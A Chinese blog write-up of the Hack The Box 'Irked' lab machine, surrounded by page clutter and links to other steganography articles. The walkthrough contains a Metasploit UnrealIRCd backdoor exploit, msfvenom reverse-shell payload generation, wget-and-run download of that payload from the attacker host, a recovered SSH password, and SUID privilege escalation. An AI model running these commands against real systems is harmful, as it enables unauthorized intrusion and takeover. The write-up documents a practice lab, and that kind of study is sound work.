linux 图片隐写,[Hack the box]Irked-Linux-10.10.10.117

最新推荐文章于 2023-02-14 17:19:22 发布
最新推荐文章于 2023-02-14 17:19:22 发布
阅读量197 收藏
点赞数
文章标签: linux 图片隐写

Nmap scan report for 10.10.10.117

Host is up (0.27s latency).

Not shown: 879 closed ports, 118 filtered ports

PORT STATE SERVICE VERSION

22/tcp open tcpwrapped

80/tcp open http Apache httpd 2.4.10 ((Debian))

|_http-server-header: Apache/2.4.10 (Debian)

|_http-title: Site doesn't have a title (text/html).

111/tcp open rpcbind 2-4 (RPC #100000)·

访问http 80端口,提示IRC

43d6a6dd89dc

默认IRC端口6667、6697

针对性的扫了一波:

43d6a6dd89dc

图片.png

msf:use unix/irc/unreal_ircd_3281_backdoor

修改端口为6697

打一波拿到控制权,不过用户权限较低

43d6a6dd89dc

图片.png

下面反弹meterpreter

利用msfvenom生成linux木马:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=9999 -f elf -o /var/www/html/meterpreter/payload_backdoor.elf

本机开启另一个msf窗口开启监听模块:

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set LHOST 10.10.14.27

set LPORT 9999

之后在服务器中执行

wget http://10.10.14.27/meterpreter/payload_backdoor.elf

chmod +x payload_backdoor.elf

./payload_backdoor.elf

成功反弹shell

尝试提权

查看系统版本

uname -a

Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

meterpreter > sysinfo

Computer : irked.irked.htb

OS : Debian 8.10 (Linux 3.16.0-6-686-pae)

Architecture : i686

BuildTuple : i486-linux-musl

Meterpreter : x86/linux

43d6a6dd89dc

系统的提权exp都试了一遍,未成功。

最终无意中找到WP发现是图片隐写=-=

看到user.txt同目录下还有.backup,提示有图片隐写

ls /home/djmardov/Documents/

user.txt

cat /home/djmardov/Documents/.backup

Super elite steg backup pw

UPupDOWNdownLRlrBAbaSSss

结合web页面的图片=-=

43d6a6dd89dc

得到密码:Kab6h+m+bbp2J:HG

ssh连接:ssh djmardov@10.10.10.117

得到user.txt

下面继续寻找root.txt

在Linux下,查找根目录下具有SUID/SGID的文件

find / -type f -perm u+s,g+s

发现/usr/bin/viewuser文件,好像还要逆向一下

贴一下wp上的源码:

43d6a6dd89dc

这就很明了了,用上面生成的msf后门下到/tmp/listusers,随后运行/usr/bin/viewuser即可直接提升到root权限,我还以为要反弹shell回去,结果都一样拉,获取root权限,得到root.txt。

参照wp把题做完了,实际想一想确实太菜了,自己可能做不出来(图片隐写有点难发现~),但是收获也还是很大的。

weixin_39876450
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf必备-foremost图片隐写提取工具多平台版 隐写术提取工具 mac linux win三版本 附带源码.zip
07-11
foremost图片隐写提取工具多平台版 隐写术提取工具 mac linux win三版本 附带源码
linux做图形,如何在Linux上做图像隐写术
weixin_39633493的博客
05-12 151
隐写术是信息隐藏的古老艺术。 人们已经找到了许多方法来实现这一点,例如“隐形”油墨,隐藏在物体中的消息,以及着名的“空密码”。 “隐写”一词来自希腊语“steganos”和“graphy”,意思是“不可穿戴的写作”。 这些年过去了,隐写术已经演变成密码学的复杂部分。 使用与过去使用的密码相同的基本原则,我们现在可以在Linux操作系统上执行类似的功能。选择工具在本教程中,我将使用OpenSteg...
Linux命令下隐写术,在Linux中,隐写术变得容易
weixin_35356909的博客
04-28 381
介绍隐写术将消息隐藏在其他消息或数据中的技巧。最常见的是,我们在图片中看到了这一点。这可能是最好的加密方法。主要是因为它看起来不像我们习惯于通过加密看到的普通乱码。隐写术所做的更改是如此之细,以至于人眼无法察觉。即使是受过训练的密码学家,也可能在图片中包含编码后的消息,并且对此一无所知。这有很深的科学。通常,这是通过在二进制级别翻转奇偶校验位来完成的。虽然了解它的工作原理非常好,但有时可能是一件非...
linux隐写文件剥离,在图像中隐藏秘密消息Steghide Kali Linux隐写术
weixin_42469444的博客
04-30 1281
在计算机科学中,将信息隐藏在图像,文档,程序,有效载荷,消息,音乐,HTML页面,可移动媒体等文件内部的技术被称为隐写术,其做法是在其他非秘密文本中隐藏消息或信息。或数据。Steghide支持以下图像格式:JPEG,BMP,WAV,AU文件。本教程使用Kali linux进行演示。安装Steghide要安装Steghide,请在Linux中打开一个终端,然后使用以下命令。apt-getinsta...
杂项-图片隐写
最新发布
orchid_sea的博客
02-14 5600
Exif按照JPEG的规格在JPEG中插入一些图像/数字相机的信息数据以及缩略图像,可以通过与JPEG兼容的互联网浏览器/图片浏览器/图像处理等一些软件来查看Exif格式的图像文件,就跟浏览通常的JPEG图像文件一样。当两张jpg图片外观、大小、像素都基本相同时,可以考虑进行结合分析,即将两个文件的像素RGB值进行XOR、ADD、SUB等操作,看能否得到有用的信息,StegSolve可以方便的进行这些操作。如果拍摄图片时,开启了GPS功能,则在图片的详细信息里会记录当前位置对应的经纬度。
linux隐写文件剥离,杂项的基本解题思路(1)——文件操作隐写、图片隐写
weixin_29313423的博客
04-30 562
文件操作隐写图片隐写压缩文件处理流量取证技术文章本来是分成4部分的,但是前两部分何在一起写了也就没有分开,所以干脆就只分了两部分文件基本类型的识别一、kail 下file 文件名原理就是识别文件文件头比如这个软件:二、WinHex 通过winhex分析能得到16进制和ascii, flag可能就在右边ascii区头部或尾部。 三、文件头残缺、错误 只告诉说是一个data文件;这时要进行修复:编辑文...
(6.4)【PC中数据隐藏】Linux中隐写简介、文件名欺骗
06-04 237
Linux隐写】通过特殊文件名隐藏文件
Linux命令下隐写术,Linux奇技淫巧:如何在Linux中使用隐写术隐藏数据
weixin_39910481的博客
04-28 295
原标题:Linux奇技淫巧:如何在Linux中使用隐写术隐藏数据隐秘术是将一个文件隐藏到另一个文件中,以在不引起任何怀疑的情况下秘密地传递信息的艺术。在本文中,我们将学习如何在Linux上的媒体文件中隐藏数据。隐写术简介正如我们所说,隐写术可以帮助我们将数据隐藏在不同类型的媒体文件中。甚至可以使用密码对数据进行加密,以防止不必要地访问其中包含的敏感信息。为了演示,我们将在linuxmi.jpg的图...
图片隐写linux,CTF-图片隐写-PNG图片修改宽高值的py3爆破
weixin_32691913的博客
05-14 549
今天拿到一个png图片隐写的题。对于这种windows下可以打开,linux下无法打开的png文件,当然是第一时间怀疑宽和高做了手脚。爆破crc校验所需要了解到的PNG文件头知识- (固定)八个字节89 50 4E 47 0D 0A 1A 0A为png的文件头- (固定)四个字节00 00 00 0D(即为十进制的13)代表数据块的长度为13- (固定)四个字节49 48 44 52(即为ASCI...
关于CTF中的一些图片隐写
kali_Chenye的博客
01-26 4916
CTF中图片隐藏文件分离方法总结 前言 可以使用winhex之类的工具先行分析其是否为图片,可以看其头部信息,还有就是JPG图片有一个特性最后的应用数据块为FF E0 活着直接使用binwalk看看图片下有什么鬼玩意儿的。 binwalk分离 命令:binwalk -e 图片路径 foremost分离 foremost分离 命令:foremost 图片地址 #会在图片地址的目录...
Go编译报错“cgo: C compiler “x86_64-linux-musl-gcc“ not found:”
qq_38696833的博客
12-13 4279
报错信息:cgo: C compiler “x86_64-linux-musl-gcc” not found: exec: “x86_64-linux-musl-gcc”: executable file not found in $PATH 带CGO的交叉编译,CGO_ENABLED必须开启。这也就需要辅助编译器来帮我们实现交叉编译了。 如果你是mac平台,可以用这个工具 FiloSottile/musl-cross/musl-cross 直接通过brew安装就可以使用 1. brew install F
简单图片隐写术破解
PPPig
03-03 2万+
这是百度杯上的一个小测试题,首先点击访问看到图片         一看名字就猜到应该是包含了压缩包,但是我们还是用工具看看,保存图片放到kali中,在终端切换到图片所在目录用binwalk查看,执行命令:binwalk zip.jpg  发现确实存在压缩包文件,继续将其提取出来,执行命令:binwalk -e zip.jpg 多出了一个压缩包文件,我们将其拿出来放
图片隐写
热门推荐
Binwalker的博客
08-30 4万+
在CTF题目中图片隐写题属于杂项的一部分,题目较为简单。本文大致梳理了下CTF比赛套路。
图片隐写之jpg后面连接文件
fox_wayen的博客
09-26 6783
所谓的图片隐写就是将信息放在了图片中的某个位置而已,我们现在只研究隐写不研究里面的东西是否加密。 第一种 首先下载图片打开看一下   图片为一美女,看不出什么东西。   下面右击图片查看属性里面的详细信息看看是否有什么东西。   这个里面是极容易隐藏信息的。当然里面的信息我们是可以进行更改的,可以写入自己的信息。 第二种   图片后面也许会连接一个文档,由于操作系统在读图片的时候
PwnTheBox
硫酸超的博客
11-30 946
靶场地址 右键查看源代码 <html> <head> <title>Welcome to PwnTheBox</title> <meta charset="utf-8"> </head> <body> <h3 align="center">欢迎来到PwnTheBox大学</h3> <p>PwnTheBox大学(PwnTheBox University)简称PTB,建校于5YWs5Y
LSB隐写总结
BadRer的博客
02-14 1万+
前言又是一年的情人节! 单身狗表示不关我事-.- 写篇博文祝贺庆祝下。一、LSB简介LSB(英文 least significant bit)即最低有效位。LSB加密是信息隐藏中最基本的方法。由于人们识别声音或图片的能力有限,因此我们稍微改动信息的某一位是不会影响我们识别声音或图片的。二、用法通常来说LSB加密用在无损压缩的数据格式文件中,例如图像中的bmp格式和音频的wav格式。由于这两种格式未
CTF之隐写(详细指导)
GLSakura的博客
09-05 8678
CTF之隐写0x01 PNG图片PNG文件结构分析https://my.oschina.net/ososchina/blog/801358(1)用16进制编辑工具更改图片的高度,会只显示图片的一部分,下面的部分就被隐藏了,是个藏东西的好办法找表示宽度和高度的位置的话,可以先看看图片的属性,得到宽高值,转成16进制,搜索16进制值就找到了注:png图片的保存恢复效果比较好,jpg貌似有点问题题目链接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值